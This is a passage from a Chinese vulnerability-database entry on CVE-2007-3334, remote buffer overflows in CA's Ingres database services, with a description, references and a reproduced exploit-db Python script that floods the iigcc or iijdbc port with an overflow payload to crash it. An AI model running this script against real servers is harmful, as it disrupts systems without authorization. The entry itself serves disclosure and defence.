Ingress数据库服务器 Communications Server 和Data Access Server组件远程堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113168 漏洞类型 缓冲区溢出
发布时间 2007-06-21 更新时间 2007-06-25
CVE编号 CVE-2007-3334 CNNVD-ID CNNVD-200706-357
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/30224
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-357
|漏洞详情
Ingres是很多CA产品默认所使用的数据库后端。CA产品所捆绑Ingres数据库服务器在处理请求数据时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制服务器。Ingres通讯服务器进程(iigcc)默认监听在TCP21064端口上。如果创建了到这个端口的连接并在很短时间内发送了两次特制表单的话,iigcc就会用攻击者可控的参数调用QUremove函数,然后QUremove覆盖可控的地址,这就允许攻击者完全控制执行流;如果向这个端口反复发送特制表单且报文之间有些停顿的话,iigcc就会调用QUinsert函数,然后QUinsert使用攻击者可控的地址执行内存操作,最终也允许控制执行流。
|漏洞EXP
source: http://www.securityfocus.com/bid/24585/info

Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"
|参考资料

来源:IDEFENSE
名称:20070621IngresDatabaseMultipleHeapCorruptionVulnerabilities
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
来源:XF
名称:ingres-wakeup-privilege-escalation(35002)
链接:http://xforce.iss.net/xforce/xfdb/35002
来源:XF
名称:ingres-data-access-server-bo(34992)
链接:http://xforce.iss.net/xforce/xfdb/34992
来源:XF
名称:ingres-communications-server-bo(34991)
链接:http://xforce.iss.net/xforce/xfdb/34991
来源:SECTRACK
名称:1018278
链接:http://www.securitytracker.com/id?1018278
来源:BID
名称:24585
链接:http://www.securityfocus.com/bid/24585
来源:VUPEN
名称:ADV-2007-2290
链接:http://www.frsirt.com/english/advisories/2007/2290
来源:VUPEN
名称:ADV-2007-2288
链接:http://www.frsirt.com/english/advisories/2007/2288
来源:www.ca.com
链接:http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
来源:supportconnectw.ca.com
链接:http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
来源:SECUNIA
名称:25775
链接:http://secunia.com/advisories/25775
来源:SECUNIA
名称:25756
链接:http://secunia